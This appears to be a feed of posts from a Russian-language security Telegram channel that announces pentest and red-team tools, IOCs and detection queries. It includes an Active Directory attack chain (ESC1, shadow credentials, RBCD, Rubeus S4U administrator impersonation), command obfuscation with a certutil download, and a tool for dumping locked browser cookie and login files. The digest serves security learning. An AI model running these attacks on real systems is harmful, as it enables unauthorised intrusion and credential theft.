💻 Nezha v1.14.10

🔗 Research (eng.) 🔗 More

Self-hosted, lightweight server and website monitoring and O&M tool. Detection only occurs when attackers execute commands through the agent

IOCs:

nz.632313373[.]xyz:8008
47.79.42[.]91

8008 - Default Nezha dashboard port
443 - Common alternative (46% of deployments)
80 - Common alternative (28% of deployments)
8888 - Alternative port
18008 - Alternative port

C:\nezha\nezha-agent.exe
C:\nezha\config.yml
C:\temp\nezha-agent.exe
C:\nezha.zip

/opt/nezha/agent/nezha-agent
/opt/nezha/agent/config.yml

nezha-agent.exe
nezha-agent
nezha_agent

services.exe → nezha-agent.exe
powershell.exe → nezha-agent.exe
nezha-agent.exe → powershell.exe
nezha-agent.exe → cmd.exe
nezha-agent.exe → whoami.exe
nezha-agent.exe → systeminfo.exe
nezha-agent.exe → net.exe

nezha-agent.exe -c C:\nezha\config.yml
client_secret
NZ_SERVER
NZ_CLIENT_SECRET
NZ_TLS
nezhahq

Queries:

// Hunt for Nezha agent process execution and file paths
DeviceProcessEvents
| where TimeGenerated > ago(90d)
| where FileName has_any ("nezha-agent", "nezha_agent") 
    or FolderPath has_any ("\\nezha\\", "/nezha/", "/opt/nezha/") 
    or ProcessCommandLine has_any ("client_secret", "nezhahq", "NZ_SERVER", "NZ_CLIENT_SECRET")
| project TimeGenerated, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName, InitiatingProcessFileName
| order by TimeGenerated desc

// Hunt for network connections to Nezha default ports and known infrastructure
DeviceNetworkEvents
| where TimeGenerated > ago(90d)
| where RemotePort in (8008, 8888, 18008) 
    or RemoteUrl has_any ("nezha", "nezhahq")
| project TimeGenerated, DeviceName, InitiatingProcessFileName, RemoteIP, RemotePort, RemoteUrl, ActionType
| order by TimeGenerated desc

// Hunt for Nezha configuration files and agent binaries on disk
DeviceFileEvents
| where TimeGenerated > ago(90d)
| where FileName has_any ("nezha-agent", "config.yml") 
    or FolderPath has_any ("\\nezha\\", "/opt/nezha/", "C:\\nezha")
| project TimeGenerated, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc

🖥 Nezha
✈️ From here

#nezha #ioc #detection #ti

✈️ Whitehat Lab 💬Chat

💻 SpicyAD

Довольно интересный инструмент, работает в интерактивном или режиме командной строки

SpicyAD is a C# Active Directory penetration testing tool designed for authorized security assessments. It combines multiple AD attack techniques into a single, easy-to-use tool with both interactive and command-line interfaces

Примеры:

# 1. Enumerate vulnerable templates
.\SpicyAD.exe enum-vulns

# 2. Exploit ESC1 (auto-chains to PKINIT)
.\SpicyAD.exe esc1 /template:ESC1 /target:administrator /sid

# 1. Add shadow credential to target machine
.\SpicyAD.exe shadow-creds add /target:SERVER$ /sid

# 1. Set RBCD
.\SpicyAD.exe rbcd set /target:SERVER$ /controlled:YOURPC$

# 2. Use Rubeus for S4U
Rubeus.exe s4u /user:YOURPC$ /rc4:<hash> /impersonateuser:administrator /msdsspn:cifs/SERVER.evilcorp.net /ptt

# 3. Access target
dir \\SERVER\C$

# 4. Cleanup
.\SpicyAD.exe rbcd clear /target:SERVER$ /force

🖥 Repo

#ad #windows #redteam

✈️ Whitehat Lab 💬Chat

🕸 OWASP Top 10 2025

The Ten Most Critical Web Application Security Risks

🔗 Introduction

#owasp #web

✈️ Whitehat Lab 💬Chat

🧪 #заметки #web #offense #defense

➡️Наконец имеем базу знаний по безопасности веб-приложений на русском языке! Основана она на базе и фундаменте – Web Security Academy от PortSwigger, потому и темы соответствующие;


   🧩   ‟Веб Секурити Академия” (@wr3dmast3rvs)


• SERVER-SIDE

▪️ SQL Injection
▪️ Аутентификация
▪️ Path Traversal
▪️ OS Command Injection
▪️ Уязвимости бизнес-логики
▪️ Раскрытие информации
▪️ Контроль доступа
▪️ Загрузка файлов
▪️ Race Conditions
▪️ SSRF
▪️ XXE Injection
▪️ NoSQL Injection
▪️ Тестирование API
▪️ Web Cache Deception

• CLIENT-SIDE

▪️ XSS
▪️ CSRF
▪️ Мисконфигурации CORS
▪️ Clickjacking / UI Redressing
▪️ DOM-based уязвимости
▪️ Тестирование WebSocket

• ADVANCED

▪️ Необходимые навыки
▪️ Небезопасная десериализация
▪️ Атаки на LLM
▪️ Тестирование GraphQL
▪️ SSTI
▪️ Web Cache Poisoning
▪️ Host Header Attacks
▪️ HTTP Request Smuggling
▪️ Тестирование OAuth
▪️ Атаки на JWT
▪️ Prototype Pollution


➡️Кстати, когда-то давно собирала для вас ресурсы для подготовки к сдаче тематического экзамена, Burp Suite Certified Practitioner (BSCP) – свою актуальность они не теряют:

Сборники информации:

🔖 DingyShark/BurpSuiteCertifiedPractitioner
🔖 botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study


Райтапы лабораторий:

📖 frank-leitner/portswigger-websecurity-academy
📖 thelicato/portswigger-labs

➡Решали лабы Web Security Academy?
Сделайте доброе дело – докиньте свои райтапы в базу! 🦸‍♂️


   @HaHacking  🐇 [🍊]

⚙️SploitScan v0.14.3

Удобный инструмент, предназначенный для поиска эксплоитов, известных уязвимостей и их эксплуатации с поддержкой AI (ChatGPT, Gemini, Grok и DeepSeek) и функцией импорта из популярных сканеров

🐧 Debian like:

sudo apt install sploitscan

Установка:

git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt

PyPi:

pip install --user sploitscan

Источники PoC'ов:

➡️GitHub
➡️ExploitDB
➡️VulnCheck (нужен free API key)
➡️Packet Storm
➡️Nuclei

Импорт из:

Nessus (.nessus)
Nexpose (.xml)
OpenVAS (.xml)
Docker (.json)

В конфиге указываем API ключи поддерживаемых сервисов (config.json)

{
    "vulncheck_api_key": "",
    "openai_api_key": "",
    "google_api_key": "",
    "grok_api_key": "",
    "deepseek_api_key": ""
}

Поиск по CVE:

sploitscan CVE-2024-1709
sploitscan CVE-2024-1709 CVE-2024-21413

Поиск по ключевым словам:

sploitscan -k "Outlook Express"

Импорт и экспорт:

sploitscan --import-file path/to/yourfile.nessus --type nessus

sploitscan CVE-2024-1709 -e {json,csv,html}

Помощь AI:

sploitscan --ai openai CVE-2024-21413

┌───[ 🤖 AI-Powered Risk Assessment ]
|
| 1. Risk Assessment
| -------------------
| ...
| 2. Potential Attack Scenarios
| ------------------------------
| ...
| 3. Mitigation Recommendations
| ------------------------------
| ...
| 4. Executive Summary
| ---------------------
| ...

😹 Repo

#sploitscan #poc #cve #python

✈️ Whitehat Lab 💬Chat

⚙️ CVE-2025-54322 - (RCE) в прошивке XSpeeder SXZOS

▪️ Вендор - XSpeeder (китайский производитель)
▪️ Уязвимый продукт - прошивка SXZOS, которая используется в устройствах SD-WAN, маршрутизаторах и оборудовании для сетевой инфраструктуры
▪️ Тип - удалённое выполнение кода без аутентификации (pre-authentication RCE)
▪️ CVSS - 9,8

🔗 Research + PoC
😹 Scanner

#poc #cve

✈️ Whitehat Lab 💬Chat

✏️ 🔄 ImHex v1.38.1

Обновление открытого шестнадцатеричного редактора для работы в 💻 🐧💻
ImHex содержит всевозможные инструменты и функции, такие как средство просмотра энтропии и встроенный интерфейс для дизассемблера Capstone
Имеет пользовательский язык шаблонов, используемый для определения структур и типов данных, который обеспечивает автоматический анализ файлов и аннотацию
Написан на 💻 Распространяется по лицензии GPL-2.0

😹 Repo
🔗 Home
🔗 Web version
🔗 Docs

#imhex #soft #cplusplus

✈️ Whitehat Lab 💬Chat

🦎🔄 AdaptixC2 v1.0

Всех с наступающим друзья! 🎄🎄🎄

Вышел major релиз лучшего open-source C2 ❤️

Благодаря комьюнити, оптимизирована кодовая база фреймворка, туннели в разы быстрее прошлой версии, значительно проапгрейжен клиент, BOFы для LDAP, ADCS и еще много всего

Обзоры

UPD 1.0:

Изменения

⭐️Возможности:

Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal

⚙️Установка/Запуск 💻:

sudo apt install mingw-w64 make gcc g++ g++-mingw-w64

wget https://go.dev/dl/go1.25.4.linux-amd64.tar.gz -O /tmp/go1.25.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.25.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go

# for windows 7 support by gopher agent
git clone https://github.com/Adaptix-Framework/go-win7 /tmp/go-win7
sudo mv /tmp/go-win7 /usr/lib/

sudo apt install gcc g++ build-essential make cmake mingw-w64 g++-mingw-w64 libssl-dev qt6-base-dev qt6-base-private-dev libxkbcommon-dev qt6-websockets-dev qt6-declarative-dev

make server-ext
make client

💻 Rep
💻 Extension-Kit
📔 Docs
✈️ Group

#adaptixc2 #redteam #soft

✈️ Whitehat Lab 💬Chat

🎄🎄🎄 Дорогие друзья, товарищи и коллеги! 🎄🎄🎄

✨ От всей души поздравляю вас с наступающим Новым Годом! Пусть этот праздник принесет вам радость, вдохновение и зарядит энергией на весь следующий год

✨ Желаю крепкого здоровья, благополучия и успехов в защите наших цифровых границ. Пусть ваши системы остаются неприступными, атаки обходят стороной, а успехи будут яркими и значительными

✨ Уверен, что новый год подарит новые знания, свежие идеи и интересные проекты. Будьте бдительны, уверены в себе и пусть ваша работа приносит удовольствие и удовлетворение

sudo mv /year2025 /year.old
sudo touch /year2026

#newyear

✈️ Whitehat Lab 💬Chat

💻 witr (why-is-this-running) v0.1.4

Отличный инструмент для ленивых, таких как я 😅 Покажет какой демон где, откуда и на каком интерфейсе крутится

Конечно есть ss, lsof, ps aux с grep и т.д.

Но здесь все в одном, рекомендую

Установка и примеры:

curl -fsSL https://raw.githubusercontent.com/pranshuparmar/witr/main/install.sh | bash

witr nginx
witr --pid 14233
witr --port 5000

💻 Repo

#witr #soft

✈️ Whitehat Lab 💬Chat

💻 MSFinger v1.0

MSFinger is a high-performance network fingerprinting tool designed for internal network reconnaissance. It rapidly identifies Microsoft services, detects security configurations, and highlights potential vulnerabilities across SMB, LDAP, and LDAPS protocols

💻 Repo

#windows #ad #ldap #smb

✈️ Whitehat Lab 💬Chat

🕸 Top 10 web hacking techniques of 2025

🔗 Research

#webpentest

✈️ Whitehat Lab 💬Chat

⚙️ ArgFuscator

Приложение с открытым исходным кодом, которое помогает генерировать обфусцированные команды для 💻 Windows, 🐧 Linux и 💻 MacOS

🔗 ArgFuscator

Invoke-ArgFuscator:

Install-Module -Name Invoke-ArgFuscator
Import-Module Invoke-ArgFuscator

Invoke-ArgFuscator -Command 'certutil /f /urlcache https://www.example.org/ homepage.txt'

Invoke-ArgFuscator -InputFile path\to\file.json

😹 Offline version

#windows #obfuscator #redteam

✈️ Whitehat Lab 💬Chat

↔️ ycprox

Возможности:

▪️ Поддержка всех HTTP(S) методов
▪️ Проксирование всех параметров и URI
▪️ Подмена заголовка X-Forwarded-For
▪️ Ротация IP-адреса (почти) при каждом запросе

🔗 Обзор
💻 Repo

#ycprox #proxy

✈️ Whitehat Lab 💬Chat

⚙️ IDontLikeFileLocks

В хозяйстве пригодится 😅 Хороший инструмент

Browsers lock their databases (Cookies, Login Data, History). You can't copy them while the browser is running. This tool steals the memory-mapped section handle from the target process and dumps the file. No file I/O, no lock checks

💻 Repo

#windows #fs #files

✈️ Whitehat Lab 💬Chat

⚙ Servy v4.8

Интересный проект для запуска различных скриптов как 💻 Windows сервисов без кучи костылей. Есть CLI и GUI варианты

Установка:

winget install servy
choco install -y servy
scoop install servy

Пример для 🐍 Python:

servy-cli install `
  --name="MyPythonJob" `
  --description="Python background job" `
  --path="C:\Python311\python.exe" `
  --params="C:\apps\scripts\job.py" `
  --startupDir="C:\apps\scripts" `
  --startupType="Automatic"

💻 Repo
📔 Docs

#servy #windows

✈️ Whitehat Lab 💬Chat

🔎 Naabu v2.3.7

Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT/UDP scans on the host/list of hosts and lists all ports that return a reply

Есть возможность использования в качестве библиотеке:

package main

import (
  "log"

  "context"
  "github.com/projectdiscovery/goflags"
  "github.com/projectdiscovery/naabu/v2/pkg/result"
  "github.com/projectdiscovery/naabu/v2/pkg/runner"
)

func main() {
  options := runner.Options{
    Host:      goflags.StringSlice{"scanme.sh"},
    ScanType: "s",
    OnResult: func(hr *result.HostResult) {
      log.Println(hr.Host, hr.Ports)
    },
    Ports: "80",
  }

  naabuRunner, err := runner.NewRunner(&options)
  if err != nil {
    log.Fatal(err)
  }
  defer naabuRunner.Close()

  naabuRunner.RunEnumeration(context.Background())
}

💻 Repo

#naabu #scanner #soft

✈️ Whitehat Lab 💬Chat

AI как допинг для Хакера

🏆 История победы 😏 FR13NDS TEAM на KazHackStan 2025

🗂 Доклад by lllbeback

#ai #khs #ctf #kazhackstan

✈️ Whitehat Lab 💬Chat

MITM attacks are widely used by penetration testers, as they have a significant impact in allowing them to intercept credentials from various services. MITM is also often part of relay attacks, when the attacker performs lateral movement across the infrastructure. However, conducting MITM attacks carries certain risks

🔘 Research

#network #mitm #ethernet

✈️ Whitehat Lab 💬Chat

🖥️ Above v2.8.1

Обновление невидимого сетевого сниффера, предназначенного для поиска уязвимостей в сетевом оборудовании. Основан на анализе сетевого трафика, поэтому не создает никакого шума в эфире. Построен на библиотеке Scapy.
Данный инструмент будет полезен не только пентестерам, но и инженерам по сетевой безопасности.

Поддерживаемые сетевые протоколы:

MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
VLAN (802.1Q)
S7COMM (Siemens) (SCADA)
OMRON (SCADA)
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP (SCADA)
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Host Standby Redundancy Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)
SNMP (Simple Network Management Protocol)

В 🐧 Kali Linux находится в репозиториях и устанавливается одной командой:

sudo apt update && sudo apt install above

Работает в двух режимах:

Hot mode - работа непосредственно с сетевым интерфейсом и возможностью включить захват пакетов по таймеру
Cold mode - анализ дампов сетевого трафика

sudo above --interface eth0 --timer 120 --output above.pcap
above --input ospf-md5.cap

😹 Repo
🔗 Kali tools

#above #sniffer #soft #python #network

✈️ Whitehat Lab 💬Chat